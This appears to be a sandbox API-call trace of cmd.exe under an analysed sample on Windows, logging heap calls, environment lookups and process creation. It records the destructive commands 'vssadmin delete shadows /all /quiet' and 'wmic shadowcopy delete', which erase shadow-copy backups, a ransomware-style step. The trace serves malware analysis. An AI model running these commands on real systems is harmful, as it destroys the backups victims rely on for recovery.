lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0105.521] GetProcessHeap () returned 0x100000 [0105.521] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x1011c0 [0105.521] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.521] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.521] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.521] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.521] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.521] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.522] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.523] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.523] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.523] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.523] GetProcessHeap () returned 0x100000 [0105.523] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x1011c0) returned 1 [0105.523] GetProcessHeap () returned 0x100000 [0105.523] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xa) returned 0x106580 [0105.523] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.524] _get_osfhandle (_FileHandle=1) returned 0x90 [0105.524] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0105.628] _get_osfhandle (_FileHandle=0) returned 0x8c [0105.628] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0105.676] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xb9f4d0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb9f51c | out: lpCommandLine="vssadmin delete shadows /all /quiet ", lpProcessInformation=0xb9f51c*(hProcess=0xe0, hThread=0xdc, dwProcessId=0xe84, dwThreadId=0xe90)) returned 1 [0106.418] CloseHandle (hObject=0xdc) returned 1 [0106.418] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.418] GetProcessHeap () returned 0x100000 [0106.418] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x107b98) returned 1 [0106.418] GetEnvironmentStringsW () returned 0x1071d8* [0106.418] GetProcessHeap () returned 0x100000 [0106.418] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb1a) returned 0x1186f8 [0106.419] FreeEnvironmentStringsA (penv="=") returned 1 [0106.419] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0116.336] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0xb9f4b4 | out: lpExitCode=0xb9f4b4*=0x2) returned 1 [0116.336] CloseHandle (hObject=0xe0) returned 1 [0116.336] _vsnwprintf (in: _Buffer=0xb9f59c, _BufferCount=0x13, _Format="%08X", _ArgList=0xb9f4bc | out: _Buffer="00000002") returned 8 [0116.336] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0116.336] GetProcessHeap () returned 0x100000 [0116.336] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x1186f8) returned 1 [0116.336] GetEnvironmentStringsW () returned 0x1186f8* [0116.336] GetProcessHeap () returned 0x100000 [0116.336] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb40) returned 0x119240 [0116.336] FreeEnvironmentStringsA (penv="=") returned 1 [0116.336] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.336] GetProcessHeap () returned 0x100000 [0116.336] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x119240) returned 1 [0116.336] GetEnvironmentStringsW () returned 0x1186f8* [0116.336] GetProcessHeap () returned 0x100000 [0116.336] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb40) returned 0x119240 [0116.336] FreeEnvironmentStringsA (penv="=") returned 1 [0116.337] GetProcessHeap () returned 0x100000 [0116.337] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x106580) returned 1 [0116.337] DeleteProcThreadAttributeList (in: lpAttributeList=0xb9f548 | out: lpAttributeList=0xb9f548) [0116.337] ??_V@YAXPAX@Z () returned 0x1 [0116.337] GetConsoleTitleW (in: lpConsoleTitle=0xb9fa48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0116.897] malloc (_Size=0xffce) returned 0x2127e0 [0116.897] ??_V@YAXPAX@Z () returned 0xb9f7d4 [0116.897] malloc (_Size=0xffce) returned 0x2227b8 [0116.897] ??_V@YAXPAX@Z () returned 0xb9f58c [0116.897] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0116.897] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0116.897] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0116.897] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0116.898] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0116.898] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0116.898] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0116.898] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0116.898] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0116.898] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0116.898] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0116.898] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0116.898] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0116.898] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0116.898] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0116.898] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0116.898] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0116.898] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0116.898] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0116.898] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0116.898] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0116.898] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0116.898] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0116.898] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0116.898] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0116.898] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0116.898] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0116.898] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0116.898] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0116.898] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0116.898] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0116.898] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0116.898] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0116.898] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0116.898] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0116.898] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0116.898] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0116.898] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0116.898] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0116.899] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0116.899] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0116.899] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0116.899] _wcsicmp (_String1="wmic", _String2="DIR") returned 19 [0116.899] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18 [0116.899] _wcsicmp (_String1="wmic", _String2="DEL") returned 19 [0116.899] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3 [0116.899] _wcsicmp (_String1="wmic", _String2="COPY") returned 20 [0116.899] _wcsicmp (_String1="wmic", _String2="CD") returned 20 [0116.899] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20 [0116.899] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5 [0116.899] _wcsicmp (_String1="wmic", _String2="REN") returned 5 [0116.899] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18 [0116.899] _wcsicmp (_String1="wmic", _String2="SET") returned 4 [0116.899] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7 [0116.899] _wcsicmp (_String1="wmic", _String2="DATE") returned 19 [0116.899] _wcsicmp (_String1="wmic", _String2="TIME") returned 3 [0116.899] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7 [0116.899] _wcsicmp (_String1="wmic", _String2="MD") returned 10 [0116.899] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10 [0116.899] _wcsicmp (_String1="wmic", _String2="RD") returned 5 [0116.899] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5 [0116.899] _wcsicmp (_String1="wmic", _String2="PATH") returned 7 [0116.899] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16 [0116.899] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4 [0116.899] _wcsicmp (_String1="wmic", _String2="CLS") returned 20 [0116.899] _wcsicmp (_String1="wmic", _String2="CALL") returned 20 [0116.899] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1 [0116.899] _wcsicmp (_String1="wmic", _String2="VER") returned 1 [0116.899] _wcsicmp (_String1="wmic", _String2="VOL") returned 1 [0116.899] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18 [0116.899] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4 [0116.899] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18 [0116.899] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3 [0116.899] _wcsicmp (_String1="wmic", _String2="START") returned 4 [0116.899] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19 [0116.900] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12 [0116.900] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10 [0116.900] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7 [0116.900] _wcsicmp (_String1="wmic", _String2="POPD") returned 7 [0116.900] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22 [0116.900] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17 [0116.900] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21 [0116.900] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20 [0116.900] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10 [0116.900] _wcsicmp (_String1="wmic", _String2="FOR") returned 17 [0116.900] _wcsicmp (_String1="wmic", _String2="IF") returned 14 [0116.900] _wcsicmp (_String1="wmic", _String2="REM") returned 5 [0116.900] ??_V@YAXPAX@Z () returned 0x1 [0116.900] GetProcessHeap () returned 0x100000 [0116.900] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xffd6) returned 0x119d88 [0116.901] GetProcessHeap () returned 0x100000 [0116.901] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x3a) returned 0x101340 [0116.901] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20 [0116.901] malloc (_Size=0xffce) returned 0x2227b8 [0116.901] ??_V@YAXPAX@Z () returned 0xb9f30c [0116.901] GetProcessHeap () returned 0x100000 [0116.901] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1ffa4) returned 0x129d68 [0116.903] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x129d70, lpFilePart=0xb9f32c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xb9f32c*="Desktop") returned 0x17 [0116.903] SetErrorMode (uMode=0x0) returned 0x1 [0116.903] GetProcessHeap () returned 0x100000 [0116.903] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x129d68, Size=0x42) returned 0x129d68 [0116.903] GetProcessHeap () returned 0x100000 [0116.903] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x129d68) returned 0x42 [0116.903] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0116.903] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0116.903] GetProcessHeap () returned 0x100000 [0116.904] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x1b4) returned 0x101388 [0116.904] GetProcessHeap () returned 0x100000 [0116.904] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x360) returned 0x107d20 [0116.904] GetProcessHeap () returned 0x100000 [0116.904] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x107d20, Size=0x1b6) returned 0x107d20 [0116.904] GetProcessHeap () returned 0x100000 [0116.904] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x107d20) returned 0x1b6 [0116.904] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xfbf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0116.904] GetProcessHeap () returned 0x100000 [0116.904] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xe0) returned 0x107ee0 [0116.904] GetProcessHeap () returned 0x100000 [0116.904] RtlReAllocateHeap (Heap=0x100000, Flags=0x0, Ptr=0x107ee0, Size=0x76) returned 0x107ee0 [0116.904] GetProcessHeap () returned 0x100000 [0116.904] RtlSizeHeap (HeapHandle=0x100000, Flags=0x0, MemoryPointer=0x107ee0) returned 0x76 [0116.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.904] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0xffffffff [0116.904] GetLastError () returned 0x2 [0116.904] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.904] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0xffffffff [0116.905] GetLastError () returned 0x2 [0116.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.905] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0xffffffff [0116.905] GetLastError () returned 0x2 [0116.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.905] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0xffffffff [0116.905] GetLastError () returned 0x2 [0116.905] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.906] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0x101548 [0116.981] FindClose (in: hFindFile=0x101548 | out: hFindFile=0x101548) returned 1 [0116.982] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0xffffffff [0116.983] GetLastError () returned 0x2 [0116.984] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0xb9f0b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb9f0b8) returned 0x101548 [0116.984] FindClose (in: hFindFile=0x101548 | out: hFindFile=0x101548) returned 1 [0116.985] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0116.985] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0116.985] ??_V@YAXPAX@Z () returned 0x1 [0116.985] GetConsoleTitleW (in: lpConsoleTitle=0xb9f5bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1c [0117.333] InitializeProcThreadAttributeList (in: lpAttributeList=0xb9f4e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xb9f4d4 | out: lpAttributeList=0xb9f4e8, lpSize=0xb9f4d4) returned 1 [0117.333] UpdateProcThreadAttribute (in: lpAttributeList=0xb9f4e8, dwFlags=0x0, Attribute=0x60001, lpValue=0xb9f4d0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xb9f4e8, lpPreviousValue=0x0) returned 1 [0117.333] GetStartupInfoW (in: lpStartupInfo=0xb9f520 | out: lpStartupInfo=0xb9f520*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0117.333] GetProcessHeap () returned 0x100000 [0117.333] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0x18) returned 0x1011d8 [0117.333] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0117.334] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0117.335] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0117.335] GetProcessHeap () returned 0x100000 [0117.335] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x1011d8) returned 1 [0117.335] GetProcessHeap () returned 0x100000 [0117.335] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xa) returned 0x106580 [0117.335] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0117.335] _get_osfhandle (_FileHandle=1) returned 0x90 [0117.335] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0117.512] _get_osfhandle (_FileHandle=0) returned 0x8c [0117.512] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0117.797] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic shadowcopy delete ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xb9f470*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wmic shadowcopy delete ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb9f4bc | out: lpCommandLine="wmic shadowcopy delete ", lpProcessInformation=0xb9f4bc*(hProcess=0xdc, hThread=0xe0, dwProcessId=0x13a8, dwThreadId=0x13cc)) returned 1 [0118.343] CloseHandle (hObject=0xe0) returned 1 [0118.343] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.343] GetProcessHeap () returned 0x100000 [0118.343] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x119240) returned 1 [0118.343] GetEnvironmentStringsW () returned 0x1186f8* [0118.344] GetProcessHeap () returned 0x100000 [0118.344] RtlAllocateHeap (HeapHandle=0x100000, Flags=0x8, Size=0xb40) returned 0x119240 [0118.344] FreeEnvironmentStringsA (penv="=") returned 1 [0118.344] WaitForSingleObject (hHandle=0xdc, dwMilliseconds=0xffffffff) returned 0x0 [0163.455] GetExitCodeProcess (in: hProcess=0xdc, lpExitCode=0xb9f454 | out: lpExitCode=0xb9f454*=0x80041014) returned 1 [0163.455] CloseHandle (hObject=0xdc) returned 1 [0163.461] _vsnwprintf (in: _Buffer=0xb9f53c, _BufferCount=0x13, _Format="%08X", _ArgList=0xb9f45c | out: _Buffer="80041014") returned 8 [0163.461] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="80041014") returned 1 [0163.461] GetProcessHeap () returned 0x100000 [0163.461] RtlFreeHeap (HeapHandle=0x100000, Flags=0x0, BaseAddress=0x119240) returned 1 [0163.462] GetEnvironmentStringsW () returned 0x1186f8* [0163.462] GetProcessHeap () returned 0x100000 [0163.462] 